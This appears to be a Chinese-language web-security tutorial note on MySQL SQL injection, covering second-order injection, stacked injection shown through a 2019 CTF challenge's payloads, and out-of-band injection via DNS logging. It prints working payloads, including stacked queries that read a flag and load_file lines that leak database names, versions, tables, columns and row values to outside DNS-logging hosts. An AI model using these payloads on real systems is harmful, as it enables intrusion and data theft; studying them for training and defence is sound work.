0%

45WEB攻防-SQL注入

思维导图

41WEB攻防

知识点:

  • 13、PHP-MYSQL-SQL注入-二次注入&利用条件
  • 14、PHP-MYSQL-SQL注入-堆叠注入&利用条件
  • 15、PHP-MYSQL-SQL注入-带外注入&利用条件

章节点:

Web层面:Web2.0 & Web3.0
语言安全:JS,ASP,PHP,NET,Java,Python等(包含框架类)
OWTOP10:注入,文件安全,XSS,RCE,XXE,CSRF,SSRF,反序列化,未授权访问等
业务逻辑:水平垂直越权,支付签约&购买充值,找回机制,数据并发,验证码&弱口令等
特殊漏洞:JWT,CRLF,CORS,重定向,JSONP回调,域名接管,DDOS,接口枚举等
关键技术:POP链构造,JS逆向调试,NET反编译,JAVA反编译,代码解密,数据解密等
Web3.0:未待完续筹备中….

PHP-MYSQL-二次注入-DEMO&74CMS

1、DEMO-用户注册登录修改密码
2、CMS-74CMS个人中心简历功能
黑盒思路:分析功能有添加后对数据操作的地方(功能点)
白盒思路:insert后进入select或update的功能的代码块
注入条件:插入时有转义函数或配置,后续有利用插入的数据
(PHP:addslashes转义函数,margic_quotes_gpc魔术引号开关–防止SQL注入,但是二次注入需要有转义或魔术引号配置)

PHP-MYSQL-堆叠注入-DEMO&CTF强网

        堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,例如php中的mysqli_multi_query函数。与之相对应的mysqli_query()只能执行一条SQL,所以要想目标存在堆叠注入,在目标主机存在类似于mysqli_multi_query()这样的函数,根据数据库类型决定是否支持多条语句执行.

1、目标存在sql注入漏洞
2、目标未对”;”号进行过滤
3、目标中间层查询数据库信息时可同时执行多条sql语句
支持堆叠数据库:MYSQL MSSQL Postgresql等

2019强网杯-随便注(CTF题型)

1
2
3
4
5
';show databases;
';show tables;
';show columns from `1919810931114514`;
';select flag from `1919810931114514`;
';SeT @a=0x73656c65637420666c61672066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;(set @a - 自定义变量;prepare -准备要执行的语句;execute - 执行由prepare语句准备的预准备语句;deallocate prepare - 发布准备好的声明)

1、目标存在sql注入漏洞
2、目标未对”;”号进行过滤
3、目标中间层查询数据库信息时可同时执行多条sql语句

PHP-MYSQL-带外注入-DEMO&DNSLOG

  • 1.注入条件
    ROOT高权限且支持load_file()
    有部分注入点是没有回显的,所有读取也是没回显的,采用带外
  • 2.使用平台
    http://ceye.io
    http://www.dnslog.cn
  • 3.带外应用场景:
    解决不回显,反向连接,SQL注入,命令执行,SSRF等
    SQL注入:
    1
    2
    3
    4
    5
    6
    7
    8
    select load_file(concat('\\\\',(select database()),'.7logee.dnslog.cn\\aa'));
    and (select load_file(concat('//',(select database()),'.69knl9.dnslog.cn/abc')))
    // 查询当前数据库
    id=1 and load_file(concat("\\\\",database(),".dbuh8a.ceye.io\\asdt"))

    //查询其他数据库
    id=1 and load_file(concat("\\\\",(select schema_name from information_schema.schemata limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))
    """
            由于该DNS记录只能回显一个字段,所以因该使用limit,第一个参数是查询起始位置,第二个参数是查询个数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    limit 0,1 查询第一个数据库名
    limit 1,1 查询第二个数据库名
    limit 2,1 查询第三个数据库名
    """
    //查询版本号
    id=1 and load_file(concat("\\\\",version(),".dbuh8a.ceye.io\\xxx.txt"))

    //查询当前数据库demo01中第一个表名
    id=1 and load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='demo01' limit 0,1 ),".dbuh8a.ceye.io\\xxx.txt"))

    """
            由于该DNS记录只能回显一个字段,所以因该使用limit,第一个参数是查询起始位置,第二个参数是查询个数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    limit 0,1 查询第一个表名
    limit 1,1 查询第二个表名
    limit 2,1 查询第三个表名
    """
    //查询security数据库emails表下第一个列名
    id=1 and load_file(concat("\\\\",(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))

    //查询字段值 数据库名为security 表名emails 列名id
    id=1 and load_file(concat("\\\\",(select id from security.emails limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))

欢迎关注我的其它发布渠道

-------------本文结束感谢您的阅读-------------